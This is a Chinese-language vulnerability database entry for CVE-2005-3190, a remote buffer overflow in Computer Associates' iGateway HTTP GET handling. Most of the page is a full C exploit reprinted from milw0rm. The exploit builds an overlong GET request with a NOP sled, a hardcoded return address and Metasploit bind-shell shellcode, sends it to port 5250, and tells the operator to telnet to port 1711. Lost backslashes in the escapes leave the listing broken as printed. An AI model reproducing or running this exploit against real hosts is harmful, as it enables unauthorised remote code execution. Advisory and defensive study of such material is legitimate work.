Computer Associates多个产品HTTP请求远程溢出漏洞

Computer Associates多个产品HTTP请求远程溢出漏洞

漏洞ID 1109123 漏洞类型 缓冲区溢出
发布时间 2005-10-10 更新时间 2005-10-20
CVE编号 CVE-2005-3190
CNNVD-ID CNNVD-200510-074
漏洞平台 Windows CVSS评分 7.5
|漏洞来源
https://www.exploit-db.com/exploits/1243
https://cxsecurity.com/issue/WLB-2005100042
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200510-074
|漏洞详情
Computer Associates是世界领先的安全厂商,产品包括多种杀毒软件。多个Computer Associates产品中存在远程溢出漏洞,起因是没有对用户数据进行正确的边界检查,可能允许攻击者执行任意机器代码。根据本页参考资料的标题,该问题出现在iGateway组件调试模式对HTTP GET请求的处理中。请注意,目前还不清楚具体有哪些产品存在漏洞,因此将所有Computer Associates产品都列为受影响产品。
|漏洞EXP
/*ca igateway debug remote overflow -egm [email protected]*/
/*01.30.05*/
#include <stdio.h>
#include <winsock2.h>
#include <errno.h>
#include <windows.h>

/* Upper bound used by main() to size its request buffer (MAXSIZE+1 bytes). */
const int MAXSIZE = 17110;

/*
 * Payload bytes that main() copies into the request; the author's trailing
 * comment attributes them to Metasploit.
 * NOTE(review): the hex escapes lost their backslashes when this page was
 * extracted, so as printed the initialiser is plain ASCII text rather than
 * the original byte values. It is kept exactly as found.
 */
char sc[] = //metasploit
"x6ax50x59xd9xeexd9x74x24xf4x5bx81x73x13x3dx19x6d"
"xf7x83xebxfcxe2xf4xc1x73x86xbaxd5xe0x92x08xc2x79"
"xe6x9bx19x3dxe6xb2x01x92x11xf2x45x18x82x7cx72x01"
"xe6xa8x1dx18x86xbexb6x2dxe6xf6xd3x28xadx6ex91x9d"
"xadx83x3axd8xa7xfax3cxdbx86x03x06x4dx49xdfx48xfc"
"xe6xa8x19x18x86x91xb6x15x26x7cx62x05x6cx1cx3ex35"
"xe6x7ex51x3dx71x96xfex28xb6x93xb6x5ax5dx7cx7dx15"
"xe6x87x21xb4xe6xb7x35x47x05x79x73x17x81xa7xc2xcf"
"x0bxa4x5bx71x5exc5x55x6ex1exc5x62x4dx92x27x55xd2"
"x80x0bx06x49x92x21x62x90x88x91xbcxf4x65xf5x68x73"
"x6fx08xedx71xb4xfexc8xb4x3ax08xebx4ax3exa4x6ex4a"
"x2exa4x7ex4ax92x27x5bx71x6bx58x5bx4axe4x16xa8x71"
"xc9xedx4dxdex3ax08xebx73x7dxa6x68xe6xbdx9fx99xb4"
"x43x1ex6axe6xbbxa4x68xe6xbdx9fxd8x50xebxbex6axe6"
"xbbxa7x69x4dx38x08xedx8ax05x10x44xdfx14xa0xc2xcf"
"x38x08xedx7fx07x93x5bx71x0ex9axb4xfcx07xa7x64x30"
"xa1x7exdax73x29x7exdfx28xadx04x97xe7x2fxdaxc3x5b"
"x41x64xb0x63x55x5cx96xb2x05x85xc3xaax7bx08x48x5d"
"x92x21x66x4ex3fxa6x6cx48x07xf6x6cx48x38xa6xc2xc9"
"x05x5axe4x1cxa3xa4xc2xcfx07x08xc2x2ex92x27xb6x4e"
"x91x74xf9x7dx92x21x6fxe6xbdx9fxcdx93x69xa8x6exe6"
"xbbx08xedx19x6dxf7";

/*
 * Resolve `host`, create a TCP socket and connect it to `port`.
 *
 * Returns the connected socket descriptor, or -1 after writing a message to
 * stderr when name resolution, socket creation or connect() fails.
 *
 * NOTE(review): when connect() fails the descriptor is returned to nobody and
 * is not closed; this mirrors the listing as published.
 * NOTE(review): the messages end in a literal "n"; the page extraction seems
 * to have dropped the backslash of a newline escape. Strings are kept as
 * printed on the page.
 */
int tcp_connect(char *host, int port)
{
    struct sockaddr_in remote;
    struct hostent *entry = gethostbyname(host);
    int fd;

    if (entry == NULL) {
        fprintf(stderr, "Something died! n");
        return -1;
    }

    /* Build the IPv4 destination from the first resolved address. */
    memset(&remote, 0, sizeof(remote));
    remote.sin_family = AF_INET;
    remote.sin_port = htons(port);
    remote.sin_addr = *(struct in_addr *)entry->h_addr;

    fd = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP);
    if (fd < 0) {
        fprintf(stderr, "Dead again!n");
        return -1;
    }

    if (connect(fd, (struct sockaddr *)&remote, sizeof(remote)) < 0) {
        fprintf(stderr, "Dead once more! n");
        return -1;
    }

    return fd;
}

/*
 * Entry point. Usage as given by the author: ./caigw-win32 hostname
 *
 * Assembles a single HTTP GET request in a stack buffer and sends it to TCP
 * port 5250 of the host named in argv[1], then prints a hint to connect to
 * port 1711. Returns 0 when no host is given or after sending, -1 when the
 * connection cannot be established.
 *
 * NOTE(review): the page extraction dropped the backslashes from the
 * character and string escapes in this function ('x90', "rnrnrn", ''), so the
 * listing does not compile as printed. It is kept exactly as found.
 *
 * Defender's view of what is visible here: the request line is a GET whose
 * URI part runs to several hundred bytes and carries non-printable data, and
 * it is addressed to TCP 5250. The closing message implies that something
 * answers on TCP 1711 afterwards (presumably opened by the payload; not
 * shown in this listing), so an unexpected listener on that port on an
 * affected host is worth investigating.
 */
int main(int argc, char *argv[])
{
char buffer[MAXSIZE+1];
int i = 0;
int sclen = sizeof(sc), sock = 0;

/* No host argument: exit silently without sending anything. */
if(!argv[1])
return 0;

/* Pre-fill the first half of the buffer with a single byte value. */
memset(buffer,'x90',MAXSIZE/2);

/* Request method. */
memcpy(buffer,"GET",3);

/* Spaces at offsets 3..23, then 'A' filler at 21..422; the second loop
   overwrites the last three spaces of the first. */
for(i=3;i<24;i++)
memcpy(buffer+i," ",1);
for(i=21;i<423;i++)
buffer[i] = 'A';

/* A 4-byte value is written at a fixed offset. The author labels the active
   line (offset 447) for Windows 2000 SP4 and the commented-out one
   (offset 448) for XP SP2. */
/* XP SP2*/ 
//memcpy(buffer + 423+25,"xddx10x12x12",4);
/*W2ksp4 */
memcpy(buffer + 422+25,"xddx10x12x12",4);

/* Payload at offset 460 (sclen - 1 leaves out the array's terminating NUL),
   followed by the HTTP version trailer and a terminator for strlen(). */
memcpy(buffer + 460,sc,sclen - 1);
memcpy(buffer + (460 + sclen)," HTTP/1.0rnrnrn",16);
buffer[460+sclen+20] = '';

if( (sock = tcp_connect(argv[1],5250)) != -1 )
{
int bytes = 0;

printf("[~] Sending request... n");
/* The length sent is whatever strlen() finds, i.e. up to the first NUL byte
   in the buffer. */
bytes = send(sock,buffer,strlen(buffer),0);
printf("[!] Sent [%d] bytesn",bytes);
}
else 
return -1;

close(sock);
sleep (2);

/* Final hint printed to the operator; names the follow-up port 1711. */
printf("[@] Now telnet to port 1711n");
return 0;
}

// milw0rm.com [2005-10-10]
|参考资料

来源:www3.ca.com
链接:http://www3.ca.com/securityadvisor/vulninfo/vuln.aspx?id=33485
来源:XF
名称:brightstor-igateway-http-get-bo(22560)
链接:http://xforce.iss.net/xforce/xfdb/22560
来源:BID
名称:15025
链接:http://www.securityfocus.com/bid/15025
来源:OSVDB
名称:19920
链接:http://www.osvdb.org/19920
来源:SECTRACK
名称:1015045
链接:http://securitytracker.com/id?1015045
来源:SREASON
名称:86
链接:http://securityreason.com/securityalert/86
来源:SECUNIA
名称:17085
链接:http://secunia.com/advisories/17085
来源:FULLDISC
名称:20051019RE:CAID33485-ComputerAssociatesiGatewaydebugmodeHTTPGETrequestbufferoverflowvulnerability
链接:http://archives.neohapsis.com/archives/fulldisclosure/2005-10/0418.html
来源:FULLDISC
名称:20051014CAID33485-ComputerAssociatesiGatewaydebugmodeHTTPGETrequestbufferoverflowvulnerability
链接:http://archives.neohapsis.com/archives/fulldisclosure/2005-10/0349.html
